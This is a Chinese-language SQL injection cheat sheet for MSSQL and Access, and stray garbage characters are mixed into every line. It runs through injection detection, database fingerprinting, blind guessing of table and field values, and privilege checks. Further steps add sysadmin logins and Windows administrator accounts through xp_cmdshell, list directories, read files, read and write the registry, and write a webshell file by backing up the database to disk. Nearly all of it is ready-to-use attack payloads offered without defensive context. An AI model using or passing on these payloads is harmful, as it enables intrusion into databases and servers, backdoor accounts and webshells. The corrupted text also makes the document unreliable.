1.判断是否有注入;and 1=1 ;and 1=2 Sq?,C�&LsA
2.初步判断是否是mssql ;and user>0 g* %bzfk=|
�Y�3D3.T6Q
3.注入参数是字符'and [查询条件] and ''=' D��5=C^`$2
�f�W(;� ��
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �*zJD$+F�o
#]"���/{�Z
5.判断数据库系统 2q+la|1Cr�
DKR<W.!*�t
;and (select count(*) from sysobjects)>0 mssql OdO{xG G@�
�4"LPJX)Q�
;and (select count(*) from msysobjects)>0 access baq�n�7k"
���N�[>:@h
"�_t4F4z��
X8�8F�>�1}
6.猜数据库 ;and (select Count(*) from [数据库名])>0 /#�29Y^Z)=
�wt�l���B
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 [�70�Y,,w�
�M�k<m6E$L
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �I�T,"8��s
FSv����1X�
9.(1)猜字段的ascii值(access) cS4xe(�n8�
���
1���U�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 nZe\�5���`
AmZ�uo�_�
(2)猜字段的ascii值(mssql) I���`lDWL
[S%J*sz~�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 HP#ki��!�'
9��_eS`�,'
10.测试权限结构(mssql) fH&zR#T7U4
'wa g |-��
ubD�#�I{~J
�%@>YNPD`E
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ACgt"
M.3F
$\+�"qs)
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- -��H4PRCDH
JW�-�|<�CJ
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �X�!o@f��$
��!!�9{U%s
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- .�-J`d=Krp
8�`�a,D5U:
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- S3;�l�K��r
L+��Eu
�d�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �9w�z�wY[{
�]Uu
aN�8�
;and 1=(select IS_MEMBER('db_owner'));-- b�"^\)|*4;
r9<V%PH��v
fa"�\=V�2S
ZH�% ��w�e
11.添加mssql和系统的帐户 ��^mAJ[^%
O!/ekU|,�r
;exec master.dbo.sp_addlogin username;-- :�|=- ��(z
;exec master.dbo.sp_password null,username,password;-- �h���5�j<u
TWtC-w��I;
;exec master.dbo.sp_addsrvrolemember sysadmin username;--
�M'��YJ"
I`�3d;�l;d
;exec master.dbo.xp_cmdshell 'net user username password kw3�+�>�{\
��h:��_�NA
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- {QM�N=O&n
O
3G:0�xF�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- WB�a /IM �
xwi!:PAf,o
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- R<>tDwsZGa
z[�*�zuo��
KA?v�.�s�
G<��|:60�5
12.(1)遍历目录 �ssPI$IRg!
&h\��7^=s.
;create table dirs(paths varchar(100), id int) QOd!]*W`?m
�'g2vX&=$A
;insert dirs exec master.dbo.xp_dirtree 'c:\' s�_T�D4~
$
�X��YM�xG:
;and (select top 1 paths from dirs)>0 FQ1arUOFW,
ghX:"vV�{n
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) $:(z}sYQ7�
0Lx3�]��"v
��?H<~ac2e
\�d��:h�$�
(2)遍历目录 @FU�~1u3d�
CP�Vm�F$A-
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- #sS9v�v�7i
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 G#|Hu;C6"�
K0LbZM�n,/
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 :4U0�I�:J#
2?*�||c==*
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 vsc�&Ju%k�
}�{A�?PHV5
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 j�"i#��R1T
�?�@>�;�/@
*�CzCUu:%t
� ;��HP#bx
13.mssql中的存储过程 2�p+�C%"n>
^B�|YO8�.v
xp_regenumvalues 注册表根键, 子键 ��>�r=6A
�
1!d)P�K>1$
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 VJ*\�pM@no
$�3]�b>v��
xp_regread 根键,子键,键值名 t�GC2
^a#~
brfKd�]i��
;exec xp_regread �Ms,@t^n�k
>�J>>\Y�(p
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 lA��z2%s{6
P��sp^@��
xp_regwrite 根键,子键, 值名, 值类型, 值 �.N!�{� �U
6W$rY] h!�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 [1Uz_HY["3
i_�N�J� -K
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 f�Q�P,���=
�����H@�Q`
xp_regdeletevalue 根键,子键,值名 pu��A�|�NT
!��[).zi+m
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �8�!;$qVt�
|UYED�%dC�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 %�2�}C'MqS
EDtCNqBS~2
v�iJJ
e'\2
K�I`11lJW~
14.mssql的backup创建webshell 16?C@`��S>
RT�/qcS^Oz
use model t{6ap�+%�L
CIEJq�l?`�
create table cmd(str image); X% X$��Y�6
Hv8H�.^�D>
insert into cmd(str) values (''); L�J�j=]�_�
yd�B$4ZB3[
backup database model to disk='c:\l.asp'; )d:�K:�YXt
�g#|oi�f9o
obj!I��7�
��d��Hq�#
15.mssql内置函数 McP��~}"!^
gJK��KR]4*
;and (select @@version)>0 获得Windows的版本号 K?[)��E3��
%Lyz_2q� A
;and user_name()='dbo' 判断当前系统的连接用户是不是sa 1|]x�o3j"'
�dq�x�d3,Z
;and (select user_name())>0 爆当前系统的连接用户 ,z �G(�u 1
��%<AS?R�y
;and (select db_name())>0 得到当前连接的数据库 _[F�@1��NJ
Qm; BU��G]
O����k*Z�
>�T� QZk4$
16.简洁的webshell {\L|s�5=yr
4#��7U��mj
use model 9qre�|�AA�
v&r=-�}z2!
create table cmd(str image); ��u1�N1n;#
�06jMj�26!
insert into cmd(str) values (''); GQ[pG{��_+
u�Ore,A�QR
backup database model to disk='g:\wwwtest\l.asp';
